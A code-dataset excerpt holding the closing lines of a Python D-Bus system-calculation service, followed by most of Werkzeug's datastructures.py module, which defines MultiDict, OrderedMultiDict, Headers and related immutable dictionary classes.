print("-------- dbus_systemcalc, v" + softwareVersion + " is starting up --------")
logger = setup_logging(args.debug)
# Have a mainloop, so we can send/receive asynchronous calls to and from dbus
DBusGMainLoop(set_as_default=True)
systemcalc = DbusSystemCalc()
# Start and run the mainloop
logger.info("Starting mainloop, responding only on events")
mainloop = GLib.MainLoop()
mainloop.run()
| mit |
ttm/oscEmRede | venv/lib/python2.7/site-packages/werkzeug/datastructures.py | 314 | 86050 | # -*- coding: utf-8 -*-
"""
werkzeug.datastructures
~~~~~~~~~~~~~~~~~~~~~~~
This module provides mixins and classes with an immutable interface.
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import re
import sys
import codecs
import mimetypes
from itertools import repeat
from werkzeug._internal import _missing, _empty_stream
from werkzeug._compat import iterkeys, itervalues, iteritems, iterlists, \
PY2, text_type, integer_types, string_types, make_literal_wrapper
_locale_delim_re = re.compile(r'[_-]')
def is_immutable(self):
raise TypeError('%r objects are immutable' % self.__class__.__name__)
def iter_multi_items(mapping):
"""Iterates over the items of a mapping yielding keys and values
without dropping any from more complex structures.
"""
if isinstance(mapping, MultiDict):
for item in iteritems(mapping, multi=True):
yield item
elif isinstance(mapping, dict):
for key, value in iteritems(mapping):
if isinstance(value, (tuple, list)):
for value in value:
yield key, value
else:
yield key, value
else:
for item in mapping:
yield item
def native_itermethods(names):
if not PY2:
return lambda x: x
def setmethod(cls, name):
itermethod = getattr(cls, name)
setattr(cls, 'iter%s' % name, itermethod)
listmethod = lambda self, *a, **kw: list(itermethod(self, *a, **kw))
listmethod.__doc__ = \
'Like :py:meth:`iter%s`, but returns a list.' % name
setattr(cls, name, listmethod)
def wrap(cls):
for name in names:
setmethod(cls, name)
return cls
return wrap
class ImmutableListMixin(object):
"""Makes a :class:`list` immutable.
.. versionadded:: 0.5
:private:
"""
_hash_cache = None
def __hash__(self):
if self._hash_cache is not None:
return self._hash_cache
rv = self._hash_cache = hash(tuple(self))
return rv
def __reduce_ex__(self, protocol):
return type(self), (list(self),)
def __delitem__(self, key):
is_immutable(self)
def __delslice__(self, i, j):
is_immutable(self)
def __iadd__(self, other):
is_immutable(self)
__imul__ = __iadd__
def __setitem__(self, key, value):
is_immutable(self)
def __setslice__(self, i, j, value):
is_immutable(self)
def append(self, item):
is_immutable(self)
remove = append
def extend(self, iterable):
is_immutable(self)
def insert(self, pos, value):
is_immutable(self)
def pop(self, index=-1):
is_immutable(self)
def reverse(self):
is_immutable(self)
def sort(self, cmp=None, key=None, reverse=None):
is_immutable(self)
class ImmutableList(ImmutableListMixin, list):
"""An immutable :class:`list`.
.. versionadded:: 0.5
:private:
"""
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
dict.__repr__(self),
)
class ImmutableDictMixin(object):
"""Makes a :class:`dict` immutable.
.. versionadded:: 0.5
:private:
"""
_hash_cache = None
@classmethod
def fromkeys(cls, keys, value=None):
instance = super(cls, cls).__new__(cls)
instance.__init__(zip(keys, repeat(value)))
return instance
def __reduce_ex__(self, protocol):
return type(self), (dict(self),)
def _iter_hashitems(self):
return iteritems(self)
def __hash__(self):
if self._hash_cache is not None:
return self._hash_cache
rv = self._hash_cache = hash(frozenset(self._iter_hashitems()))
return rv
def setdefault(self, key, default=None):
is_immutable(self)
def update(self, *args, **kwargs):
is_immutable(self)
def pop(self, key, default=None):
is_immutable(self)
def popitem(self):
is_immutable(self)
def __setitem__(self, key, value):
is_immutable(self)
def __delitem__(self, key):
is_immutable(self)
def clear(self):
is_immutable(self)
class ImmutableMultiDictMixin(ImmutableDictMixin):
"""Makes a :class:`MultiDict` immutable.
.. versionadded:: 0.5
:private:
"""
def __reduce_ex__(self, protocol):
return type(self), (list(iteritems(self, multi=True)),)
def _iter_hashitems(self):
return iteritems(self, multi=True)
def add(self, key, value):
is_immutable(self)
def popitemlist(self):
is_immutable(self)
def poplist(self, key):
is_immutable(self)
def setlist(self, key, new_list):
is_immutable(self)
def setlistdefault(self, key, default_list=None):
is_immutable(self)
class UpdateDictMixin(object):
"""Makes dicts call `self.on_update` on modifications.
.. versionadded:: 0.5
:private:
"""
on_update = None
def calls_update(name):
def oncall(self, *args, **kw):
rv = getattr(super(UpdateDictMixin, self), name)(*args, **kw)
if self.on_update is not None:
self.on_update(self)
return rv
oncall.__name__ = name
return oncall
def setdefault(self, key, default=None):
modified = key not in self
rv = super(UpdateDictMixin, self).setdefault(key, default)
if modified and self.on_update is not None:
self.on_update(self)
return rv
def pop(self, key, default=_missing):
modified = key in self
if default is _missing:
rv = super(UpdateDictMixin, self).pop(key)
else:
rv = super(UpdateDictMixin, self).pop(key, default)
if modified and self.on_update is not None:
self.on_update(self)
return rv
__setitem__ = calls_update('__setitem__')
__delitem__ = calls_update('__delitem__')
clear = calls_update('clear')
popitem = calls_update('popitem')
update = calls_update('update')
del calls_update
class TypeConversionDict(dict):
"""Works like a regular dict but the :meth:`get` method can perform
type conversions. :class:`MultiDict` and :class:`CombinedMultiDict`
are subclasses of this class and provide the same feature.
.. versionadded:: 0.5
"""
def get(self, key, default=None, type=None):
"""Return the default value if the requested data doesn't exist.
If `type` is provided and is a callable it should convert the value,
return it or raise a :exc:`ValueError` if that is not possible. In
this case the function will return the default as if the value was not
found:
>>> d = TypeConversionDict(foo='42', bar='blub')
>>> d.get('foo', type=int)
42
>>> d.get('bar', -1, type=int)
-1
:param key: The key to be looked up.
:param default: The default value to be returned if the key can't
be looked up. If not further specified `None` is
returned.
:param type: A callable that is used to cast the value in the
:class:`MultiDict`. If a :exc:`ValueError` is raised
by this callable the default value is returned.
"""
try:
rv = self[key]
if type is not None:
rv = type(rv)
except (KeyError, ValueError):
rv = default
return rv
class ImmutableTypeConversionDict(ImmutableDictMixin, TypeConversionDict):
"""Works like a :class:`TypeConversionDict` but does not support
modifications.
.. versionadded:: 0.5
"""
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return TypeConversionDict(self)
def __copy__(self):
return self
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class MultiDict(TypeConversionDict):
"""A :class:`MultiDict` is a dictionary subclass customized to deal with
multiple values for the same key which is for example used by the parsing
functions in the wrappers. This is necessary because some HTML form
elements pass multiple values for the same key.
:class:`MultiDict` implements all standard dictionary methods.
Internally, it saves all values for a key as a list, but the standard dict
access methods will only return the first value for a key. If you want to
gain access to the other values, too, you have to use the `list` methods as
explained below.
Basic Usage:
>>> d = MultiDict([('a', 'b'), ('a', 'c')])
>>> d
MultiDict([('a', 'b'), ('a', 'c')])
>>> d['a']
'b'
>>> d.getlist('a')
['b', 'c']
>>> 'a' in d
True
It behaves like a normal dict thus all dict functions will only return the
first value when multiple values for one key are found.
From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
render a page for a ``400 BAD REQUEST`` if caught in a catch-all for HTTP
exceptions.
A :class:`MultiDict` can be constructed from an iterable of
``(key, value)`` tuples, a dict, a :class:`MultiDict` or from Werkzeug 0.2
onwards some keyword parameters.
:param mapping: the initial value for the :class:`MultiDict`. Either a
regular dict, an iterable of ``(key, value)`` tuples
or `None`.
"""
def __init__(self, mapping=None):
if isinstance(mapping, MultiDict):
dict.__init__(self, ((k, l[:]) for k, l in iterlists(mapping)))
elif isinstance(mapping, dict):
tmp = {}
for key, value in iteritems(mapping):
if isinstance(value, (tuple, list)):
value = list(value)
else:
value = [value]
tmp[key] = value
dict.__init__(self, tmp)
else:
tmp = {}
for key, value in mapping or ():
tmp.setdefault(key, []).append(value)
dict.__init__(self, tmp)
def __getstate__(self):
return dict(self.lists())
def __setstate__(self, value):
dict.clear(self)
dict.update(self, value)
def __getitem__(self, key):
"""Return the first data value for this key;
raises KeyError if not found.
:param key: The key to be looked up.
:raise KeyError: if the key does not exist.
"""
if key in self:
return dict.__getitem__(self, key)[0]
raise exceptions.BadRequestKeyError(key)
def __setitem__(self, key, value):
"""Like :meth:`add` but removes an existing key first.
:param key: the key for the value.
:param value: the value to set.
"""
dict.__setitem__(self, key, [value])
def add(self, key, value):
"""Adds a new value for the key.
.. versionadded:: 0.6
:param key: the key for the value.
:param value: the value to add.
"""
dict.setdefault(self, key, []).append(value)
def getlist(self, key, type=None):
"""Return the list of items for a given key. If that key is not in the
`MultiDict`, the return value will be an empty list. Just as `get`
`getlist` accepts a `type` parameter. All items will be converted
with the callable defined there.
:param key: The key to be looked up.
:param type: A callable that is used to cast the value in the
:class:`MultiDict`. If a :exc:`ValueError` is raised
by this callable the value will be removed from the list.
:return: a :class:`list` of all the values for the key.
"""
try:
rv = dict.__getitem__(self, key)
except KeyError:
return []
if type is None:
return list(rv)
result = []
for item in rv:
try:
result.append(type(item))
except ValueError:
pass
return result
def setlist(self, key, new_list):
"""Remove the old values for a key and add new ones. Note that the list
you pass the values in will be shallow-copied before it is inserted in
the dictionary.
>>> d = MultiDict()
>>> d.setlist('foo', ['1', '2'])
>>> d['foo']
'1'
>>> d.getlist('foo')
['1', '2']
:param key: The key for which the values are set.
:param new_list: An iterable with the new values for the key. Old values
are removed first.
"""
dict.__setitem__(self, key, list(new_list))
def setdefault(self, key, default=None):
"""Returns the value for the key if it is in the dict, otherwise it
returns `default` and sets that value for `key`.
:param key: The key to be looked up.
:param default: The default value to be returned if the key is not
in the dict. If not further specified it's `None`.
"""
if key not in self:
self[key] = default
else:
default = self[key]
return default
def setlistdefault(self, key, default_list=None):
"""Like `setdefault` but sets multiple values. The list returned
is not a copy, but the list that is actually used internally. This
means that you can put new values into the dict by appending items
to the list:
>>> d = MultiDict({"foo": 1})
>>> d.setlistdefault("foo").extend([2, 3])
>>> d.getlist("foo")
[1, 2, 3]
:param key: The key to be looked up.
:param default: An iterable of default values. It is either copied
(in case it was a list) or converted into a list
before returned.
:return: a :class:`list`
"""
if key not in self:
default_list = list(default_list or ())
dict.__setitem__(self, key, default_list)
else:
default_list = dict.__getitem__(self, key)
return default_list
def items(self, multi=False):
"""Return an iterator of ``(key, value)`` pairs.
:param multi: If set to `True` the iterator returned will have a pair
for each value of each key. Otherwise it will only
contain pairs for the first value of each key.
"""
for key, values in iteritems(dict, self):
if multi:
for value in values:
yield key, value
else:
yield key, values[0]
def lists(self):
"""Return a list of ``(key, values)`` pairs, where values is the list
of all values associated with the key."""
for key, values in iteritems(dict, self):
yield key, list(values)
def keys(self):
return iterkeys(dict, self)
__iter__ = keys
def values(self):
"""Returns an iterator of the first value on every key's value list."""
for values in itervalues(dict, self):
yield values[0]
def listvalues(self):
"""Return an iterator of all values associated with a key. Zipping
:meth:`keys` and this is the same as calling :meth:`lists`:
>>> d = MultiDict({"foo": [1, 2, 3]})
>>> zip(d.keys(), d.listvalues()) == d.lists()
True
"""
return itervalues(dict, self)
def copy(self):
"""Return a shallow copy of this object."""
return self.__class__(self)
def to_dict(self, flat=True):
"""Return the contents as regular dict. If `flat` is `True` the
returned dict will only have the first item present, if `flat` is
`False` all values will be returned as lists.
:param flat: If set to `False` the dict returned will have lists
with all the values in it. Otherwise it will only
contain the first value for each key.
:return: a :class:`dict`
"""
if flat:
return dict(iteritems(self))
return dict(self.lists())
def update(self, other_dict):
"""update() extends rather than replaces existing key lists."""
for key, value in iter_multi_items(other_dict):
MultiDict.add(self, key, value)
def pop(self, key, default=_missing):
"""Pop the first item for a list on the dict. Afterwards the
key is removed from the dict, so additional values are discarded:
>>> d = MultiDict({"foo": [1, 2, 3]})
>>> d.pop("foo")
1
>>> "foo" in d
False
:param key: the key to pop.
:param default: if provided the value to return if the key was
not in the dictionary.
"""
try:
return dict.pop(self, key)[0]
except KeyError as e:
if default is not _missing:
return default
raise exceptions.BadRequestKeyError(str(e))
def popitem(self):
"""Pop an item from the dict."""
try:
item = dict.popitem(self)
return (item[0], item[1][0])
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
def poplist(self, key):
"""Pop the list for a key from the dict. If the key is not in the dict
an empty list is returned.
.. versionchanged:: 0.5
If the key does no longer exist a list is returned instead of
raising an error.
"""
return dict.pop(self, key, [])
def popitemlist(self):
"""Pop a ``(key, list)`` tuple from the dict."""
try:
return dict.popitem(self)
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
def __copy__(self):
return self.copy()
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, list(iteritems(self, multi=True)))
class _omd_bucket(object):
"""Wraps values in the :class:`OrderedMultiDict`. This makes it
possible to keep an order over multiple different keys. It requires
a lot of extra memory and slows down access a lot, but makes it
possible to access elements in O(1) and iterate in O(n).
"""
__slots__ = ('prev', 'key', 'value', 'next')
def __init__(self, omd, key, value):
self.prev = omd._last_bucket
self.key = key
self.value = value
self.next = None
if omd._first_bucket is None:
omd._first_bucket = self
if omd._last_bucket is not None:
omd._last_bucket.next = self
omd._last_bucket = self
def unlink(self, omd):
if self.prev:
self.prev.next = self.next
if self.next:
self.next.prev = self.prev
if omd._first_bucket is self:
omd._first_bucket = self.next
if omd._last_bucket is self:
omd._last_bucket = self.prev
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class OrderedMultiDict(MultiDict):
"""Works like a regular :class:`MultiDict` but preserves the
order of the fields. To convert the ordered multi dict into a
list you can use the :meth:`items` method and pass it ``multi=True``.
In general an :class:`OrderedMultiDict` is an order of magnitude
slower than a :class:`MultiDict`.
.. admonition:: note
Due to a limitation in Python you cannot convert an ordered
multi dict into a regular dict by using ``dict(multidict)``.
Instead you have to use the :meth:`to_dict` method, otherwise
the internal bucket objects are exposed.
"""
def __init__(self, mapping=None):
dict.__init__(self)
self._first_bucket = self._last_bucket = None
if mapping is not None:
OrderedMultiDict.update(self, mapping)
def __eq__(self, other):
if not isinstance(other, MultiDict):
return NotImplemented
if isinstance(other, OrderedMultiDict):
iter1 = iteritems(self, multi=True)
iter2 = iteritems(other, multi=True)
try:
for k1, v1 in iter1:
k2, v2 = next(iter2)
if k1 != k2 or v1 != v2:
return False
except StopIteration:
return False
try:
next(iter2)
except StopIteration:
return True
return False
if len(self) != len(other):
return False
for key, values in iterlists(self):
if other.getlist(key) != values:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def __reduce_ex__(self, protocol):
return type(self), (list(iteritems(self, multi=True)),)
def __getstate__(self):
return list(iteritems(self, multi=True))
def __setstate__(self, values):
dict.clear(self)
for key, value in values:
self.add(key, value)
def __getitem__(self, key):
if key in self:
return dict.__getitem__(self, key)[0].value
raise exceptions.BadRequestKeyError(key)
def __setitem__(self, key, value):
self.poplist(key)
self.add(key, value)
def __delitem__(self, key):
self.pop(key)
def keys(self):
return (key for key, value in iteritems(self))
__iter__ = keys
def values(self):
return (value for key, value in iteritems(self))
def items(self, multi=False):
ptr = self._first_bucket
if multi:
while ptr is not None:
yield ptr.key, ptr.value
ptr = ptr.next
else:
returned_keys = set()
while ptr is not None:
if ptr.key not in returned_keys:
returned_keys.add(ptr.key)
yield ptr.key, ptr.value
ptr = ptr.next
def lists(self):
returned_keys = set()
ptr = self._first_bucket
while ptr is not None:
if ptr.key not in returned_keys:
yield ptr.key, self.getlist(ptr.key)
returned_keys.add(ptr.key)
ptr = ptr.next
def listvalues(self):
for key, values in iterlists(self):
yield values
def add(self, key, value):
dict.setdefault(self, key, []).append(_omd_bucket(self, key, value))
def getlist(self, key, type=None):
try:
rv = dict.__getitem__(self, key)
except KeyError:
return []
if type is None:
return [x.value for x in rv]
result = []
for item in rv:
try:
result.append(type(item.value))
except ValueError:
pass
return result
def setlist(self, key, new_list):
self.poplist(key)
for value in new_list:
self.add(key, value)
def setlistdefault(self, key, default_list=None):
raise TypeError('setlistdefault is unsupported for '
'ordered multi dicts')
def update(self, mapping):
for key, value in iter_multi_items(mapping):
OrderedMultiDict.add(self, key, value)
def poplist(self, key):
buckets = dict.pop(self, key, ())
for bucket in buckets:
bucket.unlink(self)
return [x.value for x in buckets]
def pop(self, key, default=_missing):
try:
buckets = dict.pop(self, key)
except KeyError as e:
if default is not _missing:
return default
raise exceptions.BadRequestKeyError(str(e))
for bucket in buckets:
bucket.unlink(self)
return buckets[0].value
def popitem(self):
try:
key, buckets = dict.popitem(self)
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
for bucket in buckets:
bucket.unlink(self)
return key, buckets[0].value
def popitemlist(self):
try:
key, buckets = dict.popitem(self)
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
for bucket in buckets:
bucket.unlink(self)
return key, [x.value for x in buckets]
def _options_header_vkw(value, kw):
return dump_options_header(value, dict((k.replace('_', '-'), v)
for k, v in kw.items()))
def _unicodify_header_value(value):
if isinstance(value, bytes):
value = value.decode('latin-1')
if not isinstance(value, text_type):
value = text_type(value)
return value
@native_itermethods(['keys', 'values', 'items'])
class Headers(object):
"""An object that stores some headers. It has a dict-like interface
but is ordered and can store the same keys multiple times.
This data structure is useful if you want a nicer way to handle WSGI
headers which are stored as tuples in a list.
From Werkzeug 0.3 onwards, the :exc:`KeyError` raised by this class is
also a subclass of the :class:`~exceptions.BadRequest` HTTP exception
and will render a page for a ``400 BAD REQUEST`` if caught in a
catch-all for HTTP exceptions.
Headers is mostly compatible with the Python :class:`wsgiref.headers.Headers`
class, with the exception of `__getitem__`. :mod:`wsgiref` will return
`None` for ``headers['missing']``, whereas :class:`Headers` will raise
a :class:`KeyError`.
To create a new :class:`Headers` object pass it a list or dict of headers
which are used as default values. This does not reuse the list passed
to the constructor for internal usage.
:param defaults: The list of default values for the :class:`Headers`.
.. versionchanged:: 0.9
This data structure now stores unicode values similar to how the
multi dicts do it. The main difference is that bytes can be set as
well which will automatically be latin1 decoded.
.. versionchanged:: 0.9
The :meth:`linked` function was removed without replacement as it
was an API that does not support the changes to the encoding model.
"""
def __init__(self, defaults=None):
self._list = []
if defaults is not None:
if isinstance(defaults, (list, Headers)):
self._list.extend(defaults)
else:
self.extend(defaults)
def __getitem__(self, key, _get_mode=False):
if not _get_mode:
if isinstance(key, integer_types):
return self._list[key]
elif isinstance(key, slice):
return self.__class__(self._list[key])
if not isinstance(key, string_types):
raise exceptions.BadRequestKeyError(key)
ikey = key.lower()
for k, v in self._list:
if k.lower() == ikey:
return v
# micro optimization: if we are in get mode we will catch that
# exception one stack level down so we can raise a standard
# key error instead of our special one.
if _get_mode:
raise KeyError()
raise exceptions.BadRequestKeyError(key)
def __eq__(self, other):
return other.__class__ is self.__class__ and \
set(other._list) == set(self._list)
def __ne__(self, other):
return not self.__eq__(other)
def get(self, key, default=None, type=None, as_bytes=False):
"""Return the default value if the requested data doesn't exist.
If `type` is provided and is a callable it should convert the value,
return it or raise a :exc:`ValueError` if that is not possible. In
this case the function will return the default as if the value was not
found:
>>> d = Headers([('Content-Length', '42')])
>>> d.get('Content-Length', type=int)
42
If a headers object is bound you must not add unicode strings
because no encoding takes place.
.. versionadded:: 0.9
Added support for `as_bytes`.
:param key: The key to be looked up.
:param default: The default value to be returned if the key can't
be looked up. If not further specified `None` is
returned.
:param type: A callable that is used to cast the value in the
:class:`Headers`. If a :exc:`ValueError` is raised
by this callable the default value is returned.
:param as_bytes: return bytes instead of unicode strings.
"""
try:
rv = self.__getitem__(key, _get_mode=True)
except KeyError:
return default
if as_bytes:
rv = rv.encode('latin1')
if type is None:
return rv
try:
return type(rv)
except ValueError:
return default
def getlist(self, key, type=None, as_bytes=False):
"""Return the list of items for a given key. If that key is not in the
:class:`Headers`, the return value will be an empty list. Just as
:meth:`get` :meth:`getlist` accepts a `type` parameter. All items will
be converted with the callable defined there.
.. versionadded:: 0.9
Added support for `as_bytes`.
:param key: The key to be looked up.
:param type: A callable that is used to cast the value in the
:class:`Headers`. If a :exc:`ValueError` is raised
by this callable the value will be removed from the list.
:return: a :class:`list` of all the values for the key.
:param as_bytes: return bytes instead of unicode strings.
"""
ikey = key.lower()
result = []
for k, v in self:
if k.lower() == ikey:
if as_bytes:
v = v.encode('latin1')
if type is not None:
try:
v = type(v)
except ValueError:
continue
result.append(v)
return result
def get_all(self, name):
"""Return a list of all the values for the named field.
This method is compatible with the :mod:`wsgiref`
:meth:`~wsgiref.headers.Headers.get_all` method.
"""
return self.getlist(name)
def items(self, lower=False):
for key, value in self:
if lower:
key = key.lower()
yield key, value
def keys(self, lower=False):
for key, _ in iteritems(self, lower):
yield key
def values(self):
for _, value in iteritems(self):
yield value
def extend(self, iterable):
"""Extend the headers with a dict or an iterable yielding keys and
values.
"""
if isinstance(iterable, dict):
for key, value in iteritems(iterable):
if isinstance(value, (tuple, list)):
for v in value:
self.add(key, v)
else:
self.add(key, value)
else:
for key, value in iterable:
self.add(key, value)
def __delitem__(self, key, _index_operation=True):
if _index_operation and isinstance(key, (integer_types, slice)):
del self._list[key]
return
key = key.lower()
new = []
for k, v in self._list:
if k.lower() != key:
new.append((k, v))
self._list[:] = new
def remove(self, key):
"""Remove a key.
:param key: The key to be removed.
"""
return self.__delitem__(key, _index_operation=False)
def pop(self, key=None, default=_missing):
"""Removes and returns a key or index.
:param key: The key to be popped. If this is an integer the item at
that position is removed, if it's a string the value for
that key is. If the key is omitted or `None` the last
item is removed.
:return: an item.
"""
if key is None:
return self._list.pop()
if isinstance(key, integer_types):
return self._list.pop(key)
try:
rv = self[key]
self.remove(key)
except KeyError:
if default is not _missing:
return default
raise
return rv
def popitem(self):
"""Removes a key or index and returns a (key, value) item."""
return self.pop()
def __contains__(self, key):
"""Check if a key is present."""
try:
self.__getitem__(key, _get_mode=True)
except KeyError:
return False
return True
has_key = __contains__
def __iter__(self):
"""Yield ``(key, value)`` tuples."""
return iter(self._list)
def __len__(self):
return len(self._list)
def add(self, _key, _value, **kw):
"""Add a new header tuple to the list.
Keyword arguments can specify additional parameters for the header
value, with underscores converted to dashes::
>>> d = Headers()
>>> d.add('Content-Type', 'text/plain')
>>> d.add('Content-Disposition', 'attachment', filename='foo.png')
The keyword argument dumping uses :func:`dump_options_header`
behind the scenes.
.. versionadded:: 0.4.1
keyword arguments were added for :mod:`wsgiref` compatibility.
"""
if kw:
_value = _options_header_vkw(_value, kw)
_value = _unicodify_header_value(_value)
self._validate_value(_value)
self._list.append((_key, _value))
def _validate_value(self, value):
if not isinstance(value, text_type):
raise TypeError('Value should be unicode.')
if u'\n' in value or u'\r' in value:
raise ValueError('Detected newline in header value. This is '
'a potential security problem')
def add_header(self, _key, _value, **_kw):
"""Add a new header tuple to the list.
An alias for :meth:`add` for compatibility with the :mod:`wsgiref`
:meth:`~wsgiref.headers.Headers.add_header` method.
"""
self.add(_key, _value, **_kw)
def clear(self):
"""Clears all headers."""
del self._list[:]
def set(self, _key, _value, **kw):
"""Remove all header tuples for `key` and add a new one. The newly
added key either appears at the end of the list if there was no
entry or replaces the first one.
Keyword arguments can specify additional parameters for the header
value, with underscores converted to dashes. See :meth:`add` for
more information.
.. versionchanged:: 0.6.1
:meth:`set` now accepts the same arguments as :meth:`add`.
:param key: The key to be inserted.
:param value: The value to be inserted.
"""
if kw:
_value = _options_header_vkw(_value, kw)
_value = _unicodify_header_value(_value)
self._validate_value(_value)
if not self._list:
self._list.append((_key, _value))
return
listiter = iter(self._list)
ikey = _key.lower()
for idx, (old_key, old_value) in enumerate(listiter):
if old_key.lower() == ikey:
# replace first ocurrence
self._list[idx] = (_key, _value)
break
else:
self._list.append((_key, _value))
return
self._list[idx + 1:] = [t for t in listiter if t[0].lower() != ikey]
def setdefault(self, key, value):
"""Returns the value for the key if it is in the dict, otherwise it
returns `default` and sets that value for `key`.
:param key: The key to be looked up.
:param default: The default value to be returned if the key is not
in the dict. If not further specified it's `None`.
"""
if key in self:
return self[key]
self.set(key, value)
return value
def __setitem__(self, key, value):
"""Like :meth:`set` but also supports index/slice based setting."""
if isinstance(key, (slice, integer_types)):
if isinstance(key, integer_types):
value = [value]
value = [(k, _unicodify_header_value(v)) for (k, v) in value]
[self._validate_value(v) for (k, v) in value]
if isinstance(key, integer_types):
self._list[key] = value[0]
else:
self._list[key] = value
else:
self.set(key, value)
def to_list(self, charset='iso-8859-1'):
"""Convert the headers into a list suitable for WSGI."""
from warnings import warn
warn(DeprecationWarning('Method removed, use to_wsgi_list instead'),
stacklevel=2)
return self.to_wsgi_list()
def to_wsgi_list(self):
"""Convert the headers into a list suitable for WSGI.
The values are byte strings in Python 2 converted to latin1 and unicode
strings in Python 3 for the WSGI server to encode.
:return: list
"""
if PY2:
return [(k, v.encode('latin1')) for k, v in self]
return list(self)
def copy(self):
return self.__class__(self._list)
def __copy__(self):
return self.copy()
def __str__(self):
"""Returns formatted headers suitable for HTTP transmission."""
strs = []
for key, value in self.to_wsgi_list():
strs.append('%s: %s' % (key, value))
strs.append('\r\n')
return '\r\n'.join(strs)
def __repr__(self):
return '%s(%r)' % (
self.__class__.__name__,
list(self)
)
class ImmutableHeadersMixin(object):
"""Makes a :class:`Headers` immutable. We do not mark them as
hashable though since the only usecase for this datastructure
in Werkzeug is a view on a mutable structure.
.. versionadded:: 0.5
:private:
"""
def __delitem__(self, key):
is_immutable(self)
def __setitem__(self, key, value):
is_immutable(self)
set = __setitem__
def add(self, item):
is_immutable(self)
remove = add_header = add
def extend(self, iterable):
is_immutable(self)
def insert(self, pos, value):
is_immutable(self)
def pop(self, index=-1):
is_immutable(self)
def popitem(self):
is_immutable(self)
def setdefault(self, key, default):
is_immutable(self)
class EnvironHeaders(ImmutableHeadersMixin, Headers):
"""Read only version of the headers from a WSGI environment. This
provides the same interface as `Headers` and is constructed from
a WSGI environment.
From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
render a page for a ``400 BAD REQUEST`` if caught in a catch-all for
HTTP exceptions.
"""
def __init__(self, environ):
self.environ = environ
def __eq__(self, other):
return self.environ is other.environ
def __getitem__(self, key, _get_mode=False):
# _get_mode is a no-op for this class as there is no index but
# used because get() calls it.
key = key.upper().replace('-', '_')
if key in ('CONTENT_TYPE', 'CONTENT_LENGTH'):
return _unicodify_header_value(self.environ[key])
return _unicodify_header_value(self.environ['HTTP_' + key])
def __len__(self):
# the iter is necessary because otherwise list calls our
# len which would call list again and so forth.
return len(list(iter(self)))
def __iter__(self):
for key, value in iteritems(self.environ):
if key.startswith('HTTP_') and key not in \
('HTTP_CONTENT_TYPE', 'HTTP_CONTENT_LENGTH'):
yield (key[5:].replace('_', '-').title(),
_unicodify_header_value(value))
elif key in ('CONTENT_TYPE', 'CONTENT_LENGTH'):
yield (key.replace('_', '-').title(),
_unicodify_header_value(value))
def copy(self):
raise TypeError('cannot create %r copies' % self.__class__.__name__)
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class CombinedMultiDict(ImmutableMultiDictMixin, MultiDict):
"""A read only :class:`MultiDict` that you can pass multiple :class:`MultiDict`
instances as sequence and it will combine the return values of all wrapped
dicts:
>>> from werkzeug.datastructures import CombinedMultiDict, MultiDict
>>> post = MultiDict([('foo', 'bar')])
>>> get = MultiDict([('blub', 'blah')])
>>> combined = CombinedMultiDict([get, post])
>>> combined['foo']
'bar'
>>> combined['blub']
'blah'
This works for all read operations and will raise a `TypeError` for
methods that usually change data which isn't possible.
From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
render a page for a ``400 BAD REQUEST`` if caught in a catch-all for HTTP
exceptions.
"""
def __reduce_ex__(self, protocol):
return type(self), (self.dicts,)
def __init__(self, dicts=None):
self.dicts = dicts or []
@classmethod
def fromkeys(cls):
raise TypeError('cannot create %r instances by fromkeys' %
cls.__name__)
def __getitem__(self, key):
for d in self.dicts:
if key in d:
return d[key]
raise exceptions.BadRequestKeyError(key)
def get(self, key, default=None, type=None):
for d in self.dicts:
if key in d:
if type is not None:
try:
return type(d[key])
except ValueError:
continue
return d[key]
return default
def getlist(self, key, type=None):
rv = []
for d in self.dicts:
rv.extend(d.getlist(key, type))
return rv
def keys(self):
rv = set()
for d in self.dicts:
rv.update(d.keys())
return iter(rv)
__iter__ = keys
def items(self, multi=False):
found = set()
for d in self.dicts:
for key, value in iteritems(d, multi):
if multi:
yield key, value
elif key not in found:
found.add(key)
yield key, value
def values(self):
for key, value in iteritems(self):
yield value
def lists(self):
rv = {}
for d in self.dicts:
for key, values in iterlists(d):
rv.setdefault(key, []).extend(values)
return iteritems(rv)
def listvalues(self):
return (x[1] for x in self.lists())
def copy(self):
"""Return a shallow copy of this object."""
return self.__class__(self.dicts[:])
def to_dict(self, flat=True):
"""Return the contents as regular dict. If `flat` is `True` the
returned dict will only have the first item present, if `flat` is
`False` all values will be returned as lists.
:param flat: If set to `False` the dict returned will have lists
with all the values in it. Otherwise it will only
contain the first item for each key.
:return: a :class:`dict`
"""
rv = {}
for d in reversed(self.dicts):
rv.update(d.to_dict(flat))
return rv
def __len__(self):
return len(self.keys())
def __contains__(self, key):
for d in self.dicts:
if key in d:
return True
return False
has_key = __contains__
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self.dicts)
class FileMultiDict(MultiDict):
"""A special :class:`MultiDict` that has convenience methods to add
files to it. This is used for :class:`EnvironBuilder` and generally
useful for unittesting.
.. versionadded:: 0.5
"""
def add_file(self, name, file, filename=None, content_type=None):
"""Adds a new file to the dict. `file` can be a file name or
a :class:`file`-like or a :class:`FileStorage` object.
:param name: the name of the field.
:param file: a filename or :class:`file`-like object
:param filename: an optional filename
:param content_type: an optional content type
"""
if isinstance(file, FileStorage):
value = file
else:
if isinstance(file, string_types):
if filename is None:
filename = file
file = open(file, 'rb')
if filename and content_type is None:
content_type = mimetypes.guess_type(filename)[0] or \
'application/octet-stream'
value = FileStorage(file, filename, name, content_type)
self.add(name, value)
